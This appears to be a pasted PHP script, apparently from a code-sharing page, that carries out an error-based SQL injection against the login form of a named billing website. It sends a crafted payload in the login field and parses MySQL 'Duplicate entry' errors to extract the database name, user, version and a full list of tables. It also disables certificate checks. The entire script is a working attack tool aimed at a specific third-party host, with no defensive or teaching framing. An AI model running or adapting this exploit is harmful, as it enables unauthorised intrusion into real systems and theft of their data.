php site https billing zugres net function query site query ch curl_in

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
$site = 'https://billing.zugres.net';
function query($site, $query) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $site,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false
));
curl_setopt_array($ch, array(
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array(
'card' => rand(100000, 999999),
'login' => "' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(($query), 1, 63), FLOOR(RAND(0)*2))) -- '",
'password' => '',
'act' => '1'
)
));
$res = iconv('koi8-r', 'UTF-8', curl_exec($ch));
preg_match('/Duplicate entry \'(.*?)\d\'/', $res, $data);
return $data[1];
}
$db = query($site, 'database()');
$user = query($site, 'user()');
$version = query($site, 'version()');
$c_tables = query($site, 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\''.$db.'\'');
echo '<b>Host: </b> ' . $site . '<br/>';
echo '<b>Database: </b> ' . $db . '<br/>';
echo '<b>User: </b> ' . $user . '<br/>';
echo '<b>MySQL Version: </b> ' . $version . '<br/>';
echo '<b>Count tables: </b> ' . $c_tables . '<br/>';
echo '<b>Tables:</b><pre>' . "\n-----\n";
$tables = [];
for($i = 0; $i < $c_tables; $i++) {
$tables[] = query($site, 'SELECT table_name FROM information_schema.tables WHERE table_schema=\''.$db.'\' LIMIT '.$i.',1');
echo $tables[$i] . "\n";
}
echo '-----</pre>';